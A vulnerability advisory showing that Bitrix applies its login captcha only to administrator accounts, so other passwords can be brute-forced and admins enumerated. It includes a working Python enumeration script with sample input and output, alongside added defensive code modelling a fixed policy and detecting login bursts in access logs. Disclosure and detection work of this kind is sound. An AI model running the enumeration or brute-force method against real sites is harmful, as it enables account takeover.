User enumeration & Improper Restriction of Excessive Authentication Attempts in Bitrix

Vulnerability description:

There is an improper restriction of excessive authentication attempts in the latest version of the application “1C: site management”. It allows passwords to be brute-forced for accounts that are not in the “administrator” group. Moreover, it allows the users who are in the “administrator” group to be enumerated.

Step-by-step:

There are 3 users in the system: admin, stag and root. User admin is the default user and is in the “administrator” group. User stag has the same privileges as admin. User root is in all groups except the “administrator” group.

[Image: List of users]
[Image: stag’s groups]
[Image: root’s groups]

If you send incorrect credentials several times for users admin and stag, the server will ask you to fill in a captcha. For user root, however, the server never requests the captcha, which allows the password to be brute-forced. A response of length 753 means that the server did not request the captcha; a response of length 802 means that it did.

[Image: Attempts to brute the password for admin]
[Image: Attempts to brute the password for stag]
[Image: Attempts to brute the password for root]
[Image: Successful password matching]
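The behaviour shown above, a captcha that is demanded only for administrator-group accounts, makes the login response itself an oracle. The following model is an added example written for this page, not code from the original post or from Bitrix; the threshold of 3 failures, the account names and the two response strings (standing in for the 753-byte and 802-byte responses) are assumptions. It places the described policy beside a corrected one that throttles every submitted login the same way, whether or not the account exists or is privileged:

```python
from collections import defaultdict

CAPTCHA_THRESHOLD = 3  # assumed: failed attempts before a captcha is demanded

# Constructed sample: the accounts from the write-up plus one that does not exist
ADMIN_GROUP = {"admin", "stag"}

CAPTCHA = "login_failed+captcha"   # stands in for the 802-byte response
NO_CAPTCHA = "login_failed"        # stands in for the 753-byte response


class VulnerablePolicy:
    """Captcha only for accounts in the administrator group, as described above.
    Non-admin and non-existent logins never trigger it, so they stay
    brute-forceable and the response reveals who the administrators are."""

    def __init__(self):
        self.failures = defaultdict(int)

    def failed_attempt(self, source_ip, login):
        self.failures[login] += 1
        if login in ADMIN_GROUP and self.failures[login] >= CAPTCHA_THRESHOLD:
            return CAPTCHA
        return NO_CAPTCHA


class HardenedPolicy:
    """Apply the same threshold to every submitted login, keyed on source
    address and login string, without ever consulting group membership or
    account existence, so the response carries no group information."""

    def __init__(self):
        self.failures = defaultdict(int)

    def failed_attempt(self, source_ip, login):
        key = (source_ip, login)          # group membership is never consulted
        self.failures[key] += 1
        if self.failures[key] >= CAPTCHA_THRESHOLD:
            return CAPTCHA
        return NO_CAPTCHA


def probe(policy, logins, attempts=5, source_ip="10.0.0.1"):
    """Submit `attempts` wrong passwords per login and record the response
    sequence, which is exactly what the screenshots above compare."""
    return {login: [policy.failed_attempt(source_ip, login) for _ in range(attempts)]
            for login in logins}


def leaks_admin_group(policy_cls):
    """True if a non-admin or unknown login can be told apart from an
    administrator by the response sequence alone."""
    seen = probe(policy_cls(), ["admin", "stag", "root", "fakeuser"])
    return any(seen[login] != seen["admin"] for login in ("root", "fakeuser"))


if __name__ == "__main__":
    print("vulnerable policy leaks admin group:", leaks_admin_group(VulnerablePolicy))
    print("hardened policy leaks admin group:  ", leaks_admin_group(HardenedPolicy))
```

Under the vulnerable policy root and fakeuser never receive the captcha while admin and stag do from the third failure on; under the hardened policy all four logins produce the identical sequence, so neither brute force nor enumeration gets a signal. A real deployment would add a per-source limit on top of the per-(source, login) counter, and should keep the failure response byte-identical in both cases rather than only in wording.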

Because the captcha is not required if the user does not exist or is not in the “administrator” group, we can enumerate all users in the “administrator” group. Here is a Python script for admin enumeration:

import requests

with open("users.txt", "r") as f:
    for line in f:
        login = line.strip()
        for i in range(1, 5):
            r = requests.post('http://192.168.0.188/bitrix/admin/index.php?login=yes',
                              data={'AUTH_FORM': 'Y', 'TYPE': 'AUTH', 'USER_LOGIN': login,
                                    'USER_PASSWORD': 'not_valid_pass', 'Login': '',
                                    'captcha_sid': '', 'captcha_word': '', 'sessid': ''})
            # the captcha form only appears for accounts in the "administrator" group
            if b'CAPTCHA_CODE' in r.content:
                print("Admin found: " + login)
                break

Content of file users.txt:

root
admin
stag
fakeuser

Output:

Admin found: admin
Admin found: stag
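From the defender’s side, a run like the one above leaves a recognisable trace in the web server log: a burst of POST requests to the login endpoint from a single source address, all answered with the same small failure page. The detector below is an added example, not part of the original post; it parses constructed combined-format access-log lines (not a real capture) and flags any source that exceeds an assumed threshold of 10 login POSTs within 60 seconds:

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta, timezone

LOGIN_PATH = "/bitrix/admin/index.php?login=yes"   # endpoint used by the script above
WINDOW_SECONDS = 60
MAX_ATTEMPTS = 10   # assumed threshold; tune to the site's real traffic

# Combined log format: ip ident user [ts] "METHOD path proto" status size ...
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)


def _line(ip, ts, method, path, status, size):
    """Build one constructed log line for the sample below (not real data)."""
    return (f'{ip} - - [{ts:%d/%b/%Y:%H:%M:%S %z}] "{method} {path} HTTP/1.1" '
            f'{status} {size} "-" "python-requests/2.24.0"')


T0 = datetime(2020, 10, 10, 12, 0, 0, tzinfo=timezone.utc)
# Constructed sample: one source hammering the login form every two seconds
# (753-byte bodies, i.e. the no-captcha failure page), and a legitimate user
# who mistypes once, then logs in and reaches the admin area.
SAMPLE_LOG = (
    [_line("192.168.0.50", T0 + timedelta(seconds=2 * i), "POST", LOGIN_PATH, 200, 753)
     for i in range(12)]
    + [_line("192.168.0.7", T0 + timedelta(seconds=5), "POST", LOGIN_PATH, 200, 753),
       _line("192.168.0.7", T0 + timedelta(seconds=20), "POST", LOGIN_PATH, 302, 0),
       _line("192.168.0.7", T0 + timedelta(seconds=21), "GET", "/bitrix/admin/", 200, 4210)]
)


def parse(line):
    """Return the fields we need from one log line, or None if it does not parse."""
    m = LINE_RE.match(line)
    if not m:
        return None
    return {
        "ip": m.group("ip"),
        "ts": datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z"),
        "method": m.group("method"),
        "path": m.group("path"),
        "size": None if m.group("size") == "-" else int(m.group("size")),
    }


def detect_bursts(lines, window=WINDOW_SECONDS, max_attempts=MAX_ATTEMPTS):
    """Sliding-window count of login POSTs per source address.

    Returns {ip: timestamp} for every source at the moment it first exceeded
    max_attempts POSTs to LOGIN_PATH within `window` seconds."""
    recent = defaultdict(deque)
    alerts = {}
    for line in lines:
        ev = parse(line)
        if not ev or ev["method"] != "POST" or ev["path"] != LOGIN_PATH:
            continue
        q = recent[ev["ip"]]
        q.append(ev["ts"])
        while (ev["ts"] - q[0]).total_seconds() > window:   # drop events outside the window
            q.popleft()
        if len(q) > max_attempts and ev["ip"] not in alerts:
            alerts[ev["ip"]] = ev["ts"]
    return alerts


if __name__ == "__main__":
    for ip, ts in detect_bursts(SAMPLE_LOG).items():
        print(f"login burst from {ip} starting {ts:%H:%M:%S}")
```

On the sample the attacker’s address is flagged at its eleventh POST (12:00:20) while the legitimate user, with two POSTs, is not. The response size the write-up mentions (753 for the plain failure page versus 802 with the captcha) is a useful secondary signal: a long run of 753-byte failures from one source means the throttle never engaged, which is exactly the condition this advisory describes.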
